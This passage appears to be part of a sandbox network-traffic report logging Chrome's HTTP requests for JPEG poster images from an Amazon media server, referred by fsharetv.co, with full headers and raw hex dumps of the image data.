                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: b8 a4 dd 79 a2 e1 fb 05 19 f0 80 f9 06 e5 85 59 c1 40 cf ce 6e fe 5f 75 2d dd 19 03 93 7c 46 b1 35 37 05 e4 e8 68 bc 83 99 fc 2d fa f5 c9 48 44 46 57 69 16 a9 b0 0a 3f 33 d0 fb 27 0f 10 21 a6 d2 5d a7 f1 09 a0 c9 22 18 78 a7 f0 8d 10 30 c0 d1 3c 1a 2d 93 53 b8 e6 fc 36 84 3f 08 31 c5 1c c0 86 7c 2d 99 78 57 09 d9 42 15 62 3d 6c fd bb 9f 2f d1 9f 27 66 3f a4 8c ae 48 30 00 ee d1 6e 45 55 be db f4 9f 89 64 1e 78 5c f1 7a 32 9c a4 5a f9 bf 22 fb 95 72 70 c4 5f bd 06 7a 4a 9f ba 66 10 c7 26 fe 66 4d 7d db 7d 13 70 59 37 49 bf 53 9e 4b 25 cc 3f e3 0e 55 db 78 a0 01 c9 15 18 1f f2 85 64 d2 40 8d 57 ef 4c ff 00 ba c9 07 1c 2f 17 5e 3e 53 30 7d 20 43 fd 97 e5 16 16 71 5a ae d8 b1 41 04 15 6f b7 05 8a d7 c9 74 b0 7d 20 41 0f 92 5d 36 ac 47 5f 64 30 5f 28 b0 f7 b3
                                                                                                                                                                                          Data Ascii: yY@n_u-|F57h-HDFWi?3'!]"x0<-S6?1|-xWBb=l/'f?H0nEUdx\z2Z"rp_zJf&fM}}pY7ISK%?Uxd@WL/^>S0} CqZAot} A]6G_d0_(


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          12192.168.2.1649727151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC660OUTGET /images/M/MV5BZGViYTNjMTktMTQ3OS00NWNkLTk2Y2MtMGQ4M2JjZTUwOGRlXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 21101
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 6d41b48b-384e-4650-8392-261080539134
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 10 Aug 2022 01:57:08 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 27 Nov 2044 02:26:11 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 956826
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000142-IAD, cache-nyc-kteb1890074-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 cb 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 28 19 d6 4f 45 19 01 b6 8d 74 64 80
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5(OEtd
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 07 a3 e2 6e d3 3a 65 e7 b5 88 bf 37 76 dd 27 58 bb e7 b3 c8 e9 da b0 a8 9b 8e 51 b4 fa be 2c 81 9b a9 d5 c0 6a 35 c9 0c 35 f1 73 5b 1c 77 99 ed e9 37 ea b5 d6 36 73 25 57 b1 6d cd 2e 42 8f 53 c6 d4 a6 61 a6 7c 9f 44 62 1b 7e 1f 1a c5 3d cd ee 2f 4c 1f 19 f4 9f 9c 6d 20 55 0b 52 5e f7 a0 54 97 20 28 b2 06 4f d2 5b 7f 82 7d 11 99 99 ad ad 62 eb 7d 63 46 a6 d9 a7 69 67 d1 56 dd 39 a8 17 af 08 7a e7 a3 8a ff 00 d6 5d 98 73 c4 53 c6 e0 bc a5 ea bf 28 ae 8d 02 e3 0b 1a ba af 94 55 31 3a cf d4 fa 07 84 ef 97 cb f4 12 6e 91 77 cc 1e 60 f4 ff 00 93 6e b3 95 ab b0 fa e9 af 64 9a 80 d7 3c 0d 2d 89 86 66 34 e7 43 61 1a 53 a7 a4 e4 72 da 26 f4 8d b2 35 ce ab bb 94 93 54 cc c7 d0 ce 83 21 d5 2c 75 e2 77 9f 11 ab 94 6f c6 9b d8 f2 cd ef da 2f 8f 64 f3 af 4b c5 e1 90 09
                                                                                                                                                                                          Data Ascii: n:e7v'XQ,j55s[w76s%Wm.BSa|Db~=/Lm UR^T (O[}b}cFigV9z]sS(U1:nw`nd<-f4CaSr&5T!,uwo/dK
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff c4 00 32 10 00 01 03 02 04 04 06 02 02 02 02 03 00 00 00 00 01 00 02 03 04 11 05 10 12 21 13 15 20 31 14 22 30 32 33 34 23 40 41 51 42 61 06 24 43 50 60 ff da 00 08 01 01 00 01 08 02 ff 00 d3 cf 5f c2 79 6a e6 ab 9a 2e 68 b9 a2 e6 8b 9a 2e 6a b9 a2 e6 8b 9a 2e 68 b9 a2 e6 8b 9a 2e 6a b9 aa e6 cb 9a ae 68 b9 aa e6 cb 9b 2e 6c b9 b2 e6 ab 9a ae 6a b9 aa e6 ab 9a ae 6a b9 aa e6 ab 9b 2a 69 b8 ec 0f ce bb e6 7f a1 e2 c2 f1 8d 5e 2c 28 e4 e2 0b fa 47 a0 8f 4b 0e f8 5b 9d 77 cc fe 9a 8a 97 44 eb 07 62 07 dc 22 9d d1 bd ca 1a 87 36 36 81 e3 8e 97 b9 3a ad d7 b0 82 4e 2b 6f e8 dd 5f a2 fe 96 1d f0 b7 3a ef 99 fd 32 45 aa 66 95 51 4e ed 52 35 a2 17 eb 42 17 b5 ad 5e 19 da a2 4c 81 dc
                                                                                                                                                                                          Data Ascii: 2! 1"0234#@AQBa$CP`_yj.h.j.h.jh.ljj*i^,(GK[wDb"66:N+o_:2EfQNR5B^L
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: cd ad 62 0e 52 9b 02 54 95 86 7d 37 a7 23 43 6d 7c f1 08 f5 c2 f5 7b 0b a6 3e c4 15 0c a6 ca 27 6f 94 79 d3 fb 06 73 1f 31 5a 95 73 0c 8c bb 6a 8e ad 16 cc 1c bb 22 89 cb 04 7f e3 2d 58 c4 5a a2 0f 41 45 28 6b 81 50 4e d1 74 d9 18 fe ca a7 68 de a8 a9 75 da 47 04 33 2a a6 98 d3 bb 49 84 79 95 3b 6d 96 bb 9d a3 ce 9f d8 dc eb 09 12 39 09 5c ae 4e cb 10 67 0c cb e8 85 83 77 99 c9 e5 b2 34 b4 c9 11 81 c5 86 26 dc dd 43 7b a1 67 2b a8 a1 13 92 0d 15 63 67 04 0e 9a b8 f8 b1 3d a9 92 70 c8 2a 9e a0 9b d8 b8 ff 00 2c 2b 11 a8 d1 c3 0d a3 ae 6d 40 b1 54 fe c6 e7 56 eb 49 22 f1 a2 e9 b2 2c 45 a2 76 9b 7a 2c 7b 98 6e dc 3e b8 cd e4 7d 6c 5c 46 12 a3 77 65 11 5c 40 a2 61 94 d8 55 cc 28 60 7b 84 52 ba 17 07 36 8e b5 b5 2d ba ba d4 b5 22 f5 35 4b 21 69 73 ca 88 06 34
                                                                                                                                                                                          Data Ascii: bRT}7#Cm|{>'oys1Zsj"-XZAE(kPNthuG3*Iy;m9\Ngw4&C{g+cg=p*,+m@TVI",Evz,{n>}l\Fwe\@aU(`{R6-"5K!is4
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: c3 84 20 16 0b 80 11 85 ab 80 2e b8 2d d9 18 02 e1 35 70 5a b8 43 65 c1 09 f1 80 0f e8 60 df 52 0c f1 69 74 54 ca 9c ed 44 93 d2 d1 75 f8 f7 47 86 51 11 ef 6f c4 77 40 44 87 09 5a 34 04 68 88 da 87 0c 2f c6 8f 0d 79 37 56 61 b0 5f 8d 79 13 b4 5b 6f 4b 06 fa 90 67 ff 00 22 00 4e 7a db dc 2b 8d d6 bb 85 c4 d8 a2 f0 b8 9b 15 ab 72 53 a4 b1 5a c2 6f 94 59 6b 08 38 58 2e 20 41 e2 c2 e1 db ad 61 17 6c 83 81 45 d7 ec 5f bd d5 d0 3f ca 0f 45 a5 06 12 b4 95 a0 ab 2c 1b ea 41 9e 3f f7 24 eb 6f 71 6d 6f 44 bb 64 4b b5 2d 4f 57 7a d4 f4 ed 46 cb 53 d0 73 b7 45 cf 57 78 b0 5a 9d 60 89 7d ee bc e8 39 c5 5d f6 43 50 ba bb d5 dc 4d d7 9b 75 a9 ea ee ba f3 ee 86 a4 e9 0a e3 14 e7 ea 58 37 d4 83 3c 7b ee 4b d6 de e1 06 bb f9 70 70 ba 76 ab ad 0e 05 58 ad 2e 0b cc 6e 15 9c
                                                                                                                                                                                          Data Ascii: .-5pZCe`RitTDuGQow@DZ4h/y7Va_y[oKg"Nz+rSZoYk8X. AalE_?E,A?$oqmoDdK-OWzFSsEWxZ`}9]CPMuX7<{KppvX.n
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 0d 96 8b 45 a2 d1 68 b4 5a 13 89 bd 0f bb ff 00 69 ff c4 00 2a 11 00 02 02 01 03 04 03 00 01 04 03 00 00 00 00 00 00 01 02 11 03 04 12 21 10 13 14 31 05 20 32 33 22 30 41 61 15 40 51 ff da 00 08 01 03 01 01 08 00 96 48 c1 5c bc cc 67 9b 88 f3 31 1e 76 24 79 d8 8f 33 11 e6 62 3c bc 67 97 8c f2 b1 9e 56 33 ca c6 79 58 cf 2b 19 e4 40 f2 60 79 10 13 b5 66 a3 f0 86 8a 16 09 35 6a 1f 19 2c 89 b4 be 1f 32 74 4f 13 84 dc 58 84 5f 45 d5 14 51 1f ca 35 1f 85 d6 19 71 24 ad 7c a2 c3 c6 35 f3 b9 a9 22 79 9c e7 29 bb 13 2f ed 65 96 47 f2 8d 4f e1 16 47 13 92 b5 e2 c8 c5 f1 f2 c9 75 ff 00 0f 93 92 5f 09 93 73 4a cb 2c b1 48 dc 6e 2c 4c b3 71 0f ca 35 3f 84 33 16 a2 11 8d 4b cb c2 47 e5 3b 52 4f 13 f9 bc ce cc 9f 29 97 24 64 a5 f5 e0 ae b5 d2 1f 88 99 e1 ba 09 0f 0c 85
                                                                                                                                                                                          Data Ascii: EhZi*!1 23"0Aa@QH\g1v$y3b<gV3yX+@`yf5j,2tOX_EQ5q$|5"y)/eGOGu_sJ,Hn,Lq5?3KG;RO)$d
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: bd 1f a7 b3 5f 9c 53 60 c1 ba 1a 8d 30 b1 98 2b 19 6b bd 18 96 94 29 65 88 70 50 8f fc 91 50 88 0d 0a e1 5a 31 88 66 9f 2d df 1d 5f 86 9f e8 f1 d5 f8 69 fe 8f 1d 5f 86 93 eb 6a a5 2e df 11 d5 7f 50 d7 a7 55 2c dc 48 bb aa 97 3e 9d 54 b9 f4 ea a5 cf a7 55 2e 7d 3a a9 73 e9 d5 18 e3 7e e7 8e af c3 49 97 84 d1 27 b2 21 92 6c 9f ed 9b 63 06 a1 62 31 88 35 f1 4d 1a 5b bf c9 12 7b 2d a3 f8 55 db 52 36 1e 35 a6 a2 5a 6a 91 1f 84 d9 ff 00 22 26 2c b5 40 8c 02 6a 1d 98 40 46 0a d0 37 3c 75 7e 1a 4c bc 26 48 a1 9f 84 c9 1f d9 bb 04 c9 1d 96 4d 9e 68 78 f9 21 e3 e6 87 e1 fc 21 61 f9 42 98 9e d5 08 7e 22 fa 8b 74 51 1b d0 a4 c2 14 46 2a b8 0d cf 1d 5f 86 93 09 1e 4a 51 bf 55 28 df aa 6d a3 81 3b e6 3a bf 0d 37 12 9a dc 71 7e 1a 6d ca a9 e4 fa aa 55 b3 4c 31 42 38 d4
                                                                                                                                                                                          Data Ascii: _S`0+k)epPPZ1f-_i_j.PU,H>TU.}:s~I'!lcb15M[{-UR65Zj"&,@j@F7<u~L&HMhx!!aB~"tQF*_JQU(m;:7q~mUL1B8
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 6c 7d 9d 98 0f 81 89 4f f7 13 fd 24 ff 00 7b 04 40 a8 d4 f4 c0 fc 84 22 06 20 3f 88 7e 5e c7 56 3e c6 cc 06 3a c3 8c ac f1 12 d1 c4 92 dd 8a 6f 29 18 a3 12 51 e8 2d 2d e6 10 99 b6 58 74 44 60 ef bf 84 01 65 48 02 25 30 67 c2 15 90 88 01 56 a6 90 43 f0 58 03 80 e2 1f 8d de 79 b1 f4 36 7c 48 5d 91 2c aa e8 78 cb 65 0f 0a d5 dd 48 98 32 6a e3 43 57 1f d9 18 5c 17 ab 68 c0 11 6e 59 02 d0 36 c4 83 66 90 64 ce 52 c1 93 40 04 19 50 51 c5 08 f8 2c 54 23 05 14 51 45 17 c1 60 a7 79 e6 c7 d8 d9 16 2a 10 04 64 06 78 01 f0 08 83 43 c2 1c 06 02 1f 8b c4 c1 f3 51 41 04 45 87 75 e6 c7 d8 d9 88 86 20 d4 94 c5 c7 37 d8 9c e0 b6 c1 a8 30 82 70 98 e3 c5 c7 1f c0 40 1e 29 44 48 30 26 18 67 71 e6 c7 dc d9 8b d5 37 c0 0b e8 58 83 c8 12 a0 15 ce 1e c7 a4 44 5a 1e 8c 1d d7 f2 55
                                                                                                                                                                                          Data Ascii: l}O${@" ?~^V>:o)Q--XtD`eH%0gVCXy6|H],xeH2jCW\hnY6fdR@PQ,T#QE`y*dxCQAEu 70p@)DH0&gq7XDZU
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ef 95 97 af b4 82 2e 59 fa 03 00 8a 25 38 20 1b 1a 20 06 ce 0a 18 19 81 0d 06 b7 07 53 0c 83 3e 97 30 00 92 da e0 41 33 a2 50 cd c6 ea 0c 3c ff 00 27 11 ec f8 80 43 0e c8 3e b8 fd 67 37 cd 9d f9 fc 00 70 0a ac 4d 1d a4 15 4f 86 d7 84 4d 58 6e 02 fd 6f 08 8e ae d0 02 0b 39 2d 59 b4 12 6a 6c ff 00 be 63 34 ae 66 23 64 f6 82 20 75 d4 d4 d2 10 90 c5 80 e0 7d 77 82 25 0b 3f d8 de 02 46 9f 48 41 04 e3 47 93 04 2c 12 2f 6e 80 95 da 0e 75 b8 26 59 4c 8a 2e 01 40 e5 38 11 63 d1 07 a1 04 79 1e 4e 21 db f1 04 16 d0 26 c8 28 ae 9c cf 1b ed 8a 86 5a b2 ee 28 4e 66 e7 11 ef ce 04 1a 7e d1 e5 38 95 d7 fd 01 ce 00 e6 20 a8 81 68 2c 18 da 35 d5 6f 98 dc 41 59 85 0d 14 63 02 40 58 67 c4 fe a1 25 aa 86 55 52 01 9b 25 0e 90 89 cc 00 f3 06 02 9b b3 78 9a 90 e1 6c 33 e6 61 68
                                                                                                                                                                                          Data Ascii: .Y%8 S>0A3P<'C>g7pMOMXno9-Yjlc4f#d u}w%?FHAG,/nu&YL.@8cyN!&(Z(Nf~8 h,5oAYc@Xg%UR%xl3ah
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: b3 12 38 b0 b9 28 82 83 bd 4f 78 a6 b8 1a dc 5a c0 c3 5c fe 33 42 fd 60 ac 54 16 6d 11 f2 9a 9d a1 d2 c3 ad 75 51 d9 6b 81 ba 2f d9 a3 c1 40 08 80 14 46 62 86 05 4a eb fb 73 83 cd ee e2 ad 0d be 4a 0f 98 c3 d9 dc e2 20 8e fe 59 40 f0 84 0b 00 6f 6d b0 4c 2a f0 3a 48 86 ff 00 5b ca 69 1f 09 28 c9 9c 05 61 0e 9d 22 72 d8 57 86 74 df d7 33 07 1a b4 1f da cd e6 f0 a7 e3 10 fc 44 16 9e ae e7 17 a4 75 15 2d c0 0a 6e 17 42 f3 01 42 68 60 0b 51 8c b0 33 b3 bc 13 d9 ed 62 20 29 d3 74 c7 7f be 00 85 5b fa 1a 08 00 da 15 d2 37 f8 af 04 3f 11 02 86 7a bb 9c 7d 06 89 6f 8f 28 9e 08 47 91 fa 9c 28 47 81 cf bc 10 84 ac b6 6b 2e 17 9f 81 ce 04 75 51 29 5c 14 8c 15 86 26 b7 56 f1 1d 8f e1 18 88 7e 59 a7 ab b9 c5 be ad 11 01 9b 69 18 b5 2e c7 fb 38 90 e9 57 99 41 e4 63 a9
                                                                                                                                                                                          Data Ascii: 8(OxZ\3B`TmuQk/@FbJsJ Y@omL*:H[i(a"rWt3Du-nBBh`Q3b )t[7?z}o(G(Gk.uQ)\&V~Yi.8WAc


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          13192.168.2.1649726151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC676OUTGET /images/M/MV5BNzM2YjIwMzgtZTg4Yy00NmJlLWIzOTYtYTQ0Zjc3NjIyZDcyXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 21446
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: ccfeb1d5-33de-4e51-b2a1-6ed219533848
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 23 Dec 2015 21:32:37 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 05 Nov 2044 04:31:12 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1571448
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200073-IAD, cache-nyc-kteb1890048-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 d8 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f1 e8 33 6c cc 96 c0 b2 5b 61 41 cd 02
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"53l[aA
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: eb 34 d8 ae 58 e7 4a 94 aa 65 7f 34 85 27 5e d6 72 2c a5 52 d9 21 cf ca 01 00 59 a1 4d a8 d2 18 b5 21 56 3a ec 65 5d 5b 58 e7 1d de f4 2a a0 55 d5 83 51 de 4d 16 34 7b ff 00 27 b7 d1 7c ff 00 b0 62 38 3a bc d1 7b 41 2f d5 e6 d1 67 de ad f6 38 d8 7a 07 41 c1 5b d3 f3 08 d8 4e af 28 49 c3 10 41 30 8d 26 84 a7 42 00 0c d2 68 20 e0 a1 06 e0 6d b3 00 0d 48 30 59 a1 54 2d 6d 1d 39 0a 8e bd 1c a9 b5 6e 69 53 7d 17 c5 3d 4d c5 dd 77 47 ae e6 fe 46 9c 9b 9a f7 ce 05 ef e6 9a e1 17 4e 17 ba 62 30 8b 4a 84 04 f2 f3 9a 48 e4 04 69 12 42 96 0d 89 47 4e 20 92 00 94 83 ba 71 6d ae da c1 aa e9 96 df 9a 95 63 5a 76 1d 50 07 d8 c7 20 a6 9c 49 c9 31 a7 6d 7d 73 d0 bc 17 d0 39 75 f5 7e 29 11 9e 49 a4 f3 77 a6 bc d3 e9 19 b6 64 58 4f 36 e3 95 6e 70 d1 44 f0 7d 41 3b 64 ce fa
                                                                                                                                                                                          Data Ascii: 4XJe4'^r,R!YM!V:e][X*UQM4{'|b8:{A/g8zA[N(IA0&Bh mH0YT-m9niS}=MwGFNb0JHiBGN qmcZvP I1m}s9u~)IwdXO6npD}A;d
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 21 31 14 20 22 30 40 15 32 41 06 23 33 34 42 51 24 35 52 25 50 61 62 71 ff da 00 08 01 01 00 01 08 02 fb 22 29 8d 31 5b dd 66 a0 11 89 9f 15 c6 1c b7 83 30 ff 00 2d 61 69 ce 6f bd bf 8e 26 a7 1d c5 7e 06 2b 6f b0 f7 96 8e 51 6d f1 fb f9 d6 5b 77 2f 93 da 13 bf c7 13 7a 80 69 a5 89 31 4f af 19 be ff 00 0f e4 8f d3 f5 1b 1f 8c d7 7b 1b 7d c7 e2 09 c6 37 bc d6 bd 63 7a ac c7 3a b2 39 d4 5b 37 37 39 6a 3d b1 df b9 31 bb 8f c4 11 4c 7f 78 07 a4 3f 44 ab f7 2c 65 8e ba 82 e2 3d fc d0 bf 6d c2 7b 37 c8 bf 88 b1 86 a2 98 db 22 50 9b 69 a8 e9 1d 21 1f 33 77 10 43 f8 63 d6 1f f8 2a 06 a7 29 8f 5e 97 70 42 23 ac 75 84 7c c7 b2 8f c3 13 50 1d 47 f5 13 f8 98 d4 9b 0e a1 5e ed 1d 63 2c 23 e5 23 b0 33 d6 13 0f e0 0e ec e3 f8 dc c0 fd b1 a1 1d 8c 68 d0 89 af 93 50 88 be
                                                                                                                                                                                          Data Ascii: !1 "0@2A#34BQ$5R%Pabq")1[f0-aio&~+oQm[w/zi1O{}7cz:9[779j=1Lx?D,e=m{7"Pi!3wCc*)^pB#u|PG^c,##3hP
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: f7 05 b7 f9 6a 62 09 84 82 a5 e6 6b 05 f9 31 16 ff 00 b6 cc ca b8 92 22 7a 19 ca 6f b2 56 d5 d1 77 3f bb a9 a9 af bb 8e 9c 8c 38 fc 05 6f 12 9b 6c 1c 86 63 10 b6 25 99 ab b4 47 87 bd 00 51 57 94 dd 7b 5c 76 df 3e a6 a6 a6 be 7d 4d 4e 33 89 f9 c4 c2 5f a8 4b f2 bd 56 99 89 60 b2 b1 33 18 64 b1 d6 63 29 af 4b 68 d1 ef 59 f2 63 bf 2e dc 4c f1 99 e3 9a fb e3 b1 60 27 2f 9b 08 fa 88 df fd c6 6a a7 3d 52 d5 b2 cc e5 d2 a8 97 7b f6 a2 af 2b aa 4c 8b 94 2f 8a b9 ce 0b 20 3c a3 7d ed f7 36 1f 98 41 31 4f b4 76 f4 48 f7 3a 89 63 bf 19 d4 fd 0e a5 be fd be 9c 55 0f df 5d f9 7e 01 ec 3b 1e da 83 b6 33 7b 4b 4f f6 eb 32 cf 6f 51 a7 65 d7 54 7f ac c7 f7 32 8a 4d ac 00 cf 7e 4f c4 76 d4 3f 8a 0c 3d f8 f6 c7 31 ff 00 c0 0c 77 fa 66 0a f2 b5 4c ea 0d f5 46 f7 99 4e 6b dd
                                                                                                                                                                                          Data Ascii: jbk1"zoVw?8olc%GQW{\v>}MN3_KV`3dc)KhYc.L`'/j=R{+L/ <}6A1OvH:cU]~;3{KO2oQeT2M~Ov?=1wfLFNk
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 00 22 4c 85 23 5a 0c 96 fa 33 f0 af f6 a9 e4 ad b4 3a 30 a1 40 ad 06 9e 36 92 3f b1 8b ef 0e eb 61 05 b5 9f dc f7 7f 0b 6f b1 fc 80 74 77 17 3d 96 5b 94 6d f7 5b 4a c1 92 c0 11 da 8e a2 f4 d6 d5 4f 21 9e 43 0d 84 c5 6e 33 ca 77 b9 f1 4d 0d e4 c2 e4 fd ea ff 00 99 e3 12 ca d4 6c ce 2b b1 0a 02 27 c3 44 ab 5b 8a 8b b8 88 08 12 b5 04 98 e0 09 62 81 15 47 33 2c 03 8c d0 d1 8f c7 9a 45 03 73 d3 84 f4 d1 8a 3d 84 af 4f ca 37 a7 19 52 00 b0 80 37 a3 ec d2 b6 0d 02 81 c6 05 d0 d4 53 bd 40 9b 62 66 bd 60 5f 48 e0 18 c0 7b 4f f8 f9 15 b8 c4 66 9e be b3 66 31 31 dc 88 8e c4 c1 ce 70 27 62 2d 6c b2 c0 cb a9 a6 02 0a cf a1 9a 63 00 32 e5 d3 29 87 90 9e be d0 ec 45 52 04 3b 57 29 0f 29 c4 ef 50 06 9c 79 c7 5f 19 fa 6b db fd 27 8f b0 9c 0f f3 e3 f5 33 c4 7d 60 df 20 27
                                                                                                                                                                                          Data Ascii: "L#Z3:0@6?aotw=[m[JO!Cn3wMl+'D[bG3,Es=O7R7S@bf`_H{Off11p'b-lc2)ER;W))Py_k'3}` '
